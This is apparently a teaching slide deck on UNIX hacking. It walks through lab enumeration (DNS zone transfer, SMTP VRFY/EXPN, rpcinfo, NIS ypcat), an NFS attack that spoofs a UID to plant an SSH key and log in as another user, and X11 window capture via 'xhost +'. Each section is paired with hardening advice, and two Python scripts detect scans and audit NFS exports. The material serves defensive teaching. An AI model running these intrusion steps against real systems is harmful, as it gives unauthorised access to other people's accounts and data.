UNIX Hacking
The most common goal of a hacker is to become the root user, who controls everything on a UNIX server.
UNIX hacking includes the common footprinting and enumeration techniques: gathering public information, port scanning, and various enumeration techniques.
The information gathered this way leads to system compromise.
Gathering Public Information
Web sites: internal web sites, external web sites
Public FTP server
IP address information through the whois database
DNS: server addresses, MX records
Tools: host, nslookup, dig, google
DNS Information
[root@test ~]# host -l -a miss.com
Trying "miss.com"
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 14233
;; flags: qr aa ra; QUERY: 1, ANSWER: 8, AUTHORITY: 0, ADDITIONAL: 0

;; QUESTION SECTION:
;miss.com.                      IN      AXFR

;; ANSWER SECTION:
miss.com.               10800   IN      SOA     miss.com. admin.miss.com. ...
miss.com.               10800   IN      NS      pentarget.miss.com.
miss.com.               10800   IN      MX      10 pentarget.miss.com.
ns.miss.com.            10800   IN      CNAME   pentarget.miss.com.
pentarget.miss.com.     10800   IN      A       192.168.4.3
pentest.miss.com.       10800   IN      A       192.168.4.2
www.miss.com.           10800   IN      CNAME   pentarget.miss.com.
miss.com.               10800   IN      SOA     miss.com. admin.miss.com. ...
DNS Hardening
The DNS configuration can be hardened (BIND: /etc/named.conf): allow queries from any client, allow zone transfers only to the secondary servers, and allow recursion only to local clients.

options {
    ...
    allow-query { any; };
    allow-transfer { localhost; 192.168.4.4; };
    allow-recursion { localhost; 192.168.4.0/24; };
    recursion yes;
    ...
};
DNS Hardening
Hardening result:

[root@test nfs]# host -l -a miss.com
Trying "miss.com"
; Transfer failed.
Trying "miss.com"
Host miss.com not found: 9(NOTAUTH)
Received 40 bytes from 192.168.4.3#53 in 1 ms
; Transfer failed.
Traceroute
The network topology can be discovered with traceroute.
The location of a firewall may also be inferred from it.

[bash]$ traceroute example.com
traceroute to example.com (192.168.1.7), 30 hops max, 38 byte packets
 1  (10.1.1.1)  4.264 ms  4.245 ms  4.226 ms
 2  (10.2.1.1)  9.155 ms  9.181 ms  9.180 ms
 3  (192.168.10.90)  9.224 ms  9.183 ms  9.145 ms
 4  (192.168.10.33)  9.660 ms  9.771 ms  9.737 ms
 5  (192.168.10.217)  12.654 ms  10.145 ms  9.945 ms
 6  (192.168.11.173)  10.235 ms  9.968 ms  10.024 ms
 7  (192.168.12.97)  133.128 ms  77.520 ms  218.464 ms
 8  (192.168.13.78)  65.065 ms  65.189 ms  65.168 ms
 9  (192.168.14.252)  64.998 ms  65.021 ms  65.301 ms
10  (192.168.100.130)  82.511 ms  66.022 ms  66.170 ms
11  www.example.com (192.168.1.7)  82.355 ms  81.644 ms  84.238 ms
Traceroute Countermeasures
You cannot block inbound traceroute from the outside network, since it can be carried in any kind of IP packet.
However, you can block outbound ICMP TTL-exceeded (ICMP type 11), which is the response the internal machines send back to the traceroute source.

[Diagram: Attacker -> FW -> Local Machines. Any IP packets pass inbound; the outbound ICMP TTL-exceeded replies are blocked at the firewall.]
Ping Sweeps
A ping sweep can be done by sending ICMP echo requests (type 8) from the outside and waiting for ICMP echo replies (type 0).
A ping sweep can also be done with other techniques, such as sending ICMP information requests (type 15).
Tools: nmap, fping, hping2
Ping Sweeps
[root@test static]# ./icmpenum
USAGE: ./icmpenum [opts] [-c class C] [-d dev] [-i 1-3] [-s src] [-t sec] hosts ...
  -c  class C in x.x.x.0 form
  -i  icmp type to send/receive, types include the following:
        1 echo/echo reply (default)
        2 timestamp request/reply
        3 info request/reply
        4 mask request/reply
  -d  device to grab local IP or sniff from, default is eth0
  -s  spoofed source address
  -t  time in seconds to wait for all replies (default 5)
[root@test static]# ./icmpenum -i 2 -i eth0 -c 192.168.4.1
192.168.4.2 is up
192.168.4.3 is up
Port Scanners and OS Detection
Port scanning tools: nmap, strobe, tcp_scan and udp_scan (part of SAINT), netcat (nc)
OS detection tools: nmap, queso
Detecting Port Scanners
Several tools can detect port scanning activity: psad, scanlogd (TCP only), Snort.
Some of this software can also integrate with the firewall, so that further scanning from the same source is blocked.
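As an added example (not from the original slides), the per-source heuristic that scan detectors such as scanlogd and psad apply: one source touching many distinct ports on one host within a short window. The log lines are constructed in iptables LOG-target format, and the threshold and window values are assumptions to be tuned per network.

```python
import re
from collections import defaultdict

# Constructed sample firewall log lines in iptables LOG-target format
# (hypothetical hosts). 192.168.4.2 probes six ports within three seconds;
# 192.168.4.10 makes two ordinary SSH connections a minute and a half apart.
SAMPLE_LOG = """\
Feb 18 17:29:01 fw kernel: IN=eth0 SRC=192.168.4.2 DST=192.168.4.3 PROTO=TCP SPT=40001 DPT=21 SYN
Feb 18 17:29:01 fw kernel: IN=eth0 SRC=192.168.4.2 DST=192.168.4.3 PROTO=TCP SPT=40002 DPT=22 SYN
Feb 18 17:29:02 fw kernel: IN=eth0 SRC=192.168.4.2 DST=192.168.4.3 PROTO=TCP SPT=40004 DPT=25 SYN
Feb 18 17:29:02 fw kernel: IN=eth0 SRC=192.168.4.2 DST=192.168.4.3 PROTO=TCP SPT=40005 DPT=79 SYN
Feb 18 17:29:02 fw kernel: IN=eth0 SRC=192.168.4.2 DST=192.168.4.3 PROTO=TCP SPT=40006 DPT=111 SYN
Feb 18 17:29:03 fw kernel: IN=eth0 SRC=192.168.4.2 DST=192.168.4.3 PROTO=TCP SPT=40007 DPT=2049 SYN
Feb 18 17:29:05 fw kernel: IN=eth0 SRC=192.168.4.10 DST=192.168.4.3 PROTO=TCP SPT=51000 DPT=22 SYN
Feb 18 17:30:40 fw kernel: IN=eth0 SRC=192.168.4.10 DST=192.168.4.3 PROTO=TCP SPT=51001 DPT=22 SYN
"""

# Time of day, source, destination and destination port from one log line.
LINE_RE = re.compile(r"(\d\d):(\d\d):(\d\d) .*?SRC=(\S+) DST=(\S+) .*?DPT=(\d+)")


def parse_line(line):
    """Return (seconds_of_day, src, dst, dport), or None for an unparseable line."""
    m = LINE_RE.search(line)
    if not m:
        return None
    hh, mm, ss, src, dst, dport = m.groups()
    return int(hh) * 3600 + int(mm) * 60 + int(ss), src, dst, int(dport)


def detect_scans(log_text, threshold=5, window=60):
    """Map (src, dst) -> sorted distinct ports for every pair where one source
    hits at least `threshold` distinct ports on one host within `window` seconds.
    Both numbers are assumed defaults, not values from the slides."""
    events = defaultdict(list)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec:
            t, src, dst, dport = rec
            events[(src, dst)].append((t, dport))
    alerts = {}
    for pair, evs in events.items():
        evs.sort()
        for i, (t0, _) in enumerate(evs):  # slide a window starting at each event
            ports = {p for t, p in evs[i:] if t - t0 <= window}
            if len(ports) >= threshold:
                alerts[pair] = sorted(ports)
                break
    return alerts
```

A detector like this reports the scanner but not the single SSH client; firewall integration, as the slide notes, would then add a block rule for the reported source.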
Banner Grabbing
Information that can be obtained includes the Secure Shell server software and protocol version, and the mail server software.
Tools: telnet, netcat, amap, vmap
Banner Grabbing
[root@test static]# telnet 192.168.4.3 22
Trying 192.168.4.3...
Connected to 192.168.4.3.
Escape character is '^]'.
SSH-2.0-OpenSSH_5.2

Protocol mismatch.
Connection closed by foreign host.

[root@test static]# telnet 192.168.4.3 25
220 relay.mut.ac.th ESMTP Sendmail 8.13.8/8.14.2; ...
quit
221 2.0.0 xxx.xxx.ac.th closing connection
Connection to host lost.
FTP Enumeration
An attacker may use any FTP client to walk the directory structure of an FTP server and check whether any permissions are set wrongly.
Most anonymous FTP servers accept any e-mail address as the password.
If a world-writable directory is found, the attacker has a way to upload (hacking) tools to your server and will look for a way to execute them later.
If the FTP server software has security issues, the attacker may launch an exploit against it.
A successful exploit gives the attacker access as the user the FTP service runs as.
SMTP Enumeration
An SMTP server may be used to gain more information about users on the target machine.
The SMTP command VRFY can be used to confirm valid usernames.
EXPN can be used to expand the membership of a mailing list.
SMTP Enumeration
[root$]telnet 10.219.100.1 25
Trying 10.219.100.1...
Connected to 10.219.100.1.
Escape character is '^]'.
220 mail.example.com ESMTP Sendmail Tue, 15 Jul 2008
vrfy root
250 root <[email protected]>
expn test
250 test <[email protected]>
expn mailing-list
250 .... the whole list of subscribers ...
quit
221 mail.example.com closing connection
TFTP Enumeration
Trivial File Transfer Protocol (TFTP) is a UDP-based protocol for unauthenticated "quick and dirty" file transfers.
TFTP runs on UDP port 69. It is commonly used to transfer device ROM images and configuration backups/restores.
A configuration can hold information valuable to the attacker, such as passwords or password hashes of the network devices.
You should always block TFTP requests from all but trusted addresses.
Finger Enumeration
On old UNIX servers, the finger service may still be running.
The attacker may obtain the list of logged-in users, as well as valid user names.
The finger service is no longer common on modern UNIX.

[root$]finger [email protected]
[192.168.202.34]
    Line     User      Host(s)    Idle Location
*  2 vty 0             idle          0 192.168.202.14
RPC Enumeration
All RPC-based services must register with the RPC server.
Common RPC services include NIS and NFS.
The rpcinfo command can be used to enumerate the available services, their versions, and the ports they listen on.
The RPC server itself runs on TCP and UDP port 111.
The RPC server service is commonly referred to as rpcbind or portmapper.
RPC Enumeration
[root@test static]# rpcinfo -p 192.168.4.3
   program vers proto   port  service
    100000    4   tcp    111  portmapper
    100000    4   udp    111  portmapper
    100024    1   udp  50626  status
    100024    1   tcp  34440  status
    100011    2   udp    875  rquotad
    100011    2   tcp    875  rquotad
    100021    4   udp  51211  nlockmgr
    100021    4   tcp  49851  nlockmgr
    100003    3   tcp   2049  nfs
    100003    4   tcp   2049  nfs
    100003    3   udp   2049  nfs
    100003    4   udp   2049  nfs
    100005    2   udp  47214  mountd
    100005    2   tcp  46771  mountd
    100005    3   udp  47214  mountd
    100005    3   tcp  46771  mountd
R-cmd Enumeration
R-commands are used in traditional UNIX to support remote administration tasks. Authentication is controlled by a configuration file called .rhosts in the home directory of the target user.
A common misconfiguration is to put a plus symbol (+) in the .rhosts file. This allows every machine to control the target machine remotely as the specified user.
R-commands include rexec, rsh, rlogin and rcp. They are not common in modern UNIX.
SSH should be used as the replacement.
R-cmd Enumeration
hammer$ cat .rhosts
gryphon.csi.cam.ac.uk
oneeye.csi.cam.ac.uk

gryphon$ rlogin hammer.thor
Last login: Mon Oct 11 13:10:02 from gryphon.csi.cam.ac.uk
Solaris Release 2.5 [hammer] Linux Redhat Release 4.2
hammer$

gryphon$ rsh -l rjd4 hammer.thor.cam.ac.uk uname -n
hammer.thor.cam.ac.uk
NIS Enumeration
NIS data can be retrieved with the ypcat and ypmatch commands.
NIS data may be accessed remotely, but the attacker needs to know the NIS domain name.

[root@pentarget ~]# nisdomainname
miss
[root@pentarget ~]# ypcat passwd
testnis1:!!:1001:1001::/home/testnis1:/bin/bash
test1:!!:501:501::/home/test1:/bin/bash
admin:$6$OKCPxAVpdPN$pn...pVp8B6i.:500:500::/home/admin:/bin/bash
[root@pentarget ~]# ypmatch admin passwd
admin:$6$OKCPxAVpdPN$pn...pVp8B6i.:500:500::/home/admin:/bin/bash
[root@pentarget ~]#
Hardening NIS
Configure the (/var/log/)securenets configuration file to allow NIS access only from the NIS client machines.
Make the NIS domain name harder to guess.
Note that the NIS domain name is easy to find for anyone who can log into an NIS client machine.
NFS Enumeration
NFS exports can be discovered remotely with the showmount command.
NFS authentication is, by default, checked against the IP address of the NFS client machine.
If the address is trusted, any UID supplied by the client is trusted by the server as well.
Any misconfiguration of the NFS exports may lead to system compromise.
nfsshell is another tool for interacting with an NFS server directly.
NFS Attacks
[root@pentarget ~]# cat /etc/exports
/home   *(rw)
/mnt    pentarget.miss.com(rw)
/usr    *(ro)

[root@pentest static]# showmount -e 192.168.4.3
Export list for 192.168.4.3:
/usr  *
/home *
/mnt  pentarget.miss.com
NFS Attacks
[root@pentest ~]# mount 192.168.4.3:/home /mnt
[root@pentest ~]# ls -l /mnt
total 12
drwx------. 26 admin admin 4096 2010-02-18 16:05 admin
drwx------.  6   501   501 4096 2010-02-16 15:22 test1
[root@pentest ~]# useradd -u 501 hoho
[root@pentest ~]# id hoho
uid=501(hoho) gid=501(hoho) groups=501(hoho)
[root@pentest ~]# su - hoho
[hoho@pentest test1]$ cd /mnt/test1
[hoho@pentest test1]$ mkdir .ssh
[hoho@pentest test1]$ cd .ssh
[hoho@pentest .ssh]$ cp ~/.ssh/id_rsa.pub authorized_keys
[hoho@pentest .ssh]$ chmod 644 authorized_keys
[hoho@pentest .ssh]$ chmod 700 .
NFS Attacks
[hoho@pentest .ssh]$ ls -la
total 12
drwx------. 2 hoho hoho 4096 2010-02-18 17:29 .
drwx------. 7 hoho hoho 4096 2010-02-18 17:28 ..
-rw-r--r--. 1 hoho hoho  403 2010-02-18 17:29 authorized_keys
[hoho@pentest .ssh]$ ssh-agent
SSH_AUTH_SOCK=/tmp/ssh-jGbArm2818/agent.2818; export SSH_AUTH_SOCK;
SSH_AGENT_PID=2819; export SSH_AGENT_PID;
echo Agent pid 2819;
[hoho@pentest .ssh]$ SSH_AUTH_SOCK=/tmp/ssh-jGbArm2818/agent.2818; export SSH_AUTH_SOCK;
[hoho@pentest .ssh]$ SSH_AGENT_PID=2819; export SSH_AGENT_PID;
NFS Attacks
[hoho@pentest .ssh]$ ssh-add
Enter passphrase for /home/hoho/.ssh/id_rsa:
Identity added: /home/hoho/.ssh/id_rsa (/home/hoho/.ssh/id_rsa)
[hoho@pentest .ssh]$ ssh -l test1 192.168.4.3
...
Last login: Tue Feb 16 15:24:27 2010 from 192.168.4.2
[test1@pentarget ~]$ id
uid=501(test1) gid=501(test1) groups=501(test1)
Hardening NFS
Only export file systems to trusted machines.
Export file systems read-only if possible.
Use root ownership for exported files and directories.
Do not export the server's executables.
Always use the showmount command to double-check that you have configured it securely.
Do not allow users to log into the NFS server.
Use TCP_Wrappers to block NFS access, if possible.
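An added example (not from the original slides) that checks an /etc/exports file for the settings the NFS attack above relied on and the hardening slide warns against: wildcard clients, read-write exports, and no_root_squash. The sample exports text is constructed to mirror the deck's /etc/exports plus one export written the recommended way; the parser follows the Linux exports(5) "path client(options)" layout.

```python
import re

# Constructed sample that mirrors the /etc/exports shown in the NFS slides,
# plus one export written the way the hardening slide recommends.
SAMPLE_EXPORTS = """\
# /etc/exports (constructed sample)
/home   *(rw)
/mnt    pentarget.miss.com(rw)
/usr    *(ro)
/data   192.168.4.0/24(ro,root_squash,sync)
"""

# Either "client(opt,opt)" or a bare client with no option list.
CLIENT_RE = re.compile(r"(\S+?)\((.*?)\)|(\S+)")


def parse_exports(text):
    """Return [(path, [(client, set_of_options), ...]), ...], skipping comments."""
    exports = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        parts = line.split(None, 1)
        path, rest = parts[0], parts[1] if len(parts) > 1 else ""
        clients = []
        for m in CLIENT_RE.finditer(rest):
            if m.group(3):                       # bare host: default options apply
                clients.append((m.group(3), set()))
            else:
                opts = {o.strip() for o in m.group(2).split(",") if o.strip()}
                clients.append((m.group(1), opts))
        if not clients:                          # no client list at all: everyone
            clients.append(("*", set()))
        exports.append((path, clients))
    return exports


def audit_exports(text):
    """Return (path, client, finding) triples for the weaknesses the slides warn about."""
    findings = []
    for path, clients in parse_exports(text):
        for client, opts in clients:
            if client == "*" or client.startswith("*."):
                findings.append((path, client, "exported to a wildcard client"))
            if "rw" in opts:
                findings.append((path, client, "read-write export"))
            if "no_root_squash" in opts:
                findings.append((path, client, "no_root_squash: remote root is local root"))
    return findings
```

On the deck's own exports this flags /home twice (wildcard and read-write), which is exactly the combination that let any host mount /home and plant an authorized_keys file under a chosen UID.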
X-Windows Security
X-Windows grants many privileges to remote clients, including: capturing keystrokes, killing windows, capturing windows, remapping keyboard keys.
X access control is xhost authentication, which is IP-based. Most users simply type "xhost +" to allow access. This means that anyone can access the X-Windows system on the server.
X-Windows Security
xscan can be used to scan for X-Windows access on the network.
xlsclients lists all windows on a display; xkill kills any window; xwd dumps a screen to a file; xwud displays an image created by xwd.
X-Windows Security
[testnis1@pentarget ~]$ id
uid=1001(testnis1) gid=1001(testnis1) groups=1001(testnis1)
[testnis1@pentarget ~]$ xlsclients
xlsclients: unable to open display ""

[admin@pentarget ~]$ xhost +
Access control disabled, clients can connect from any host
[admin@pentarget ~]$
X-Windows Security
[testnis1@pentarget ~]$ xlsclients -display :0.0 -l
...
Window 0xe00001:
  Machine:  pentarget.miss.com
  Name:  Terminal
  Icon Name:  gnome-terminal
  Command:  gnome-terminal
  Instance/Class:  gnome-terminal/Gnome-terminal
Window 0x4200001:
  Machine:  pentarget.miss.com
  Name:  Firefox
  Icon Name:  firefox
  Command:  firefox
  Instance/Class:  firefox/Firefox
...
[testnis1@pentarget ~]$ xkill -display :0.0 -id 0x4200001
xkill:  killing creator of resource 0x4200001
Vulnerability Mapping
After gathering security information about the server, a hacker can map it manually to find potential vulnerabilities.
This process is called vulnerability mapping and can be done by:
Manually mapping the gathered information to potential vulnerabilities.
Using public and proof-of-concept exploits to test whether the vulnerabilities can be exploited successfully.
Using vulnerability scanners to find potential exploits, although this is noisy.
Vulnerability Mapping
Script kiddies simply skip the vulnerability mapping process and shoot everything at the target.
It is common to see Windows exploits fired at UNIX/Linux servers.
Vulnerability Mapping
The common vulnerability mapping process includes:
Performing network reconnaissance against the target system.
Mapping attributes such as operating system, architecture, and specific versions of listening services to known vulnerabilities and exploits.
Performing target acquisition by identifying and selecting key systems.
Enumerating and prioritizing potential points of entry.
System Access
There are two types of access to a UNIX/Linux server.
Remote access is gained via the network or another communication channel.
Local access means having an actual command shell and escalating to higher privileges. These are usually called privilege escalation attacks.
System Access
Remote access and local access are related.
Attackers remotely exploit a vulnerability in a listening service and thereby gain local shell access.
Once shell access is obtained, the attackers are considered local on the system.
Then the attackers escalate their local privileges to root.
Brute-Force Attack
Password brute-force attacks can be conducted against several services, including: telnet, ftp, R-commands, Secure Shell (SSH), POP3, IMAP, HTTP, HTTPS, CVS/SVN.
Brute-Force Attack Countermeasures
Use strong passwords by enforcing a password policy.
This can be done through system configuration and additional software:
Cracklib
System configuration files such as /etc/security/login.conf
PAM
Brute-Force Attack Countermeasures
In addition to the general password strength recommendations:
Log multiple authentication failures.
Implement account lockout where possible (beware of DoS attacks).
Disable unused services.
Use stronger authentication when possible, for example one-time passwords (OTP), public key authentication, or security tokens.
Attacks from Bad Coding
Attacks that stem from bad coding practices include: buffer overflow attacks, format string attacks, weak input validation, integer overflow and integer sign attacks, dangling pointer attacks.
Countermeasures
Always update software with security patches.
Beware of obsolete software.
Use secure coding practices.
Conduct software audits regularly.
Disable unused services.
Stack Protection
Administrators may disable stack execution to lower the chance of a successful stack overflow attack.
This is done by modifying settings in the proper (OS-dependent) configuration files: Solaris: /etc/system; Linux: depends on the distribution.
This does not prevent other, similar techniques such as heap overflows.
Generic UNIX Protection
For all UNIX machines, the following protection measures can be taken:
Separate the network of the UNIX servers from the clients.
Use TCP_Wrappers.
Enable a host-based firewall, and consider what traffic should pass the firewall; RPC traffic can remain inside the DMZ.
Enforce a password policy.
Do not share admin accounts.
Centralize logs on a log server (syslog).
Disable root login (except for recovery).
Implement sudo, letting users perform tasks as root or as a privileged user.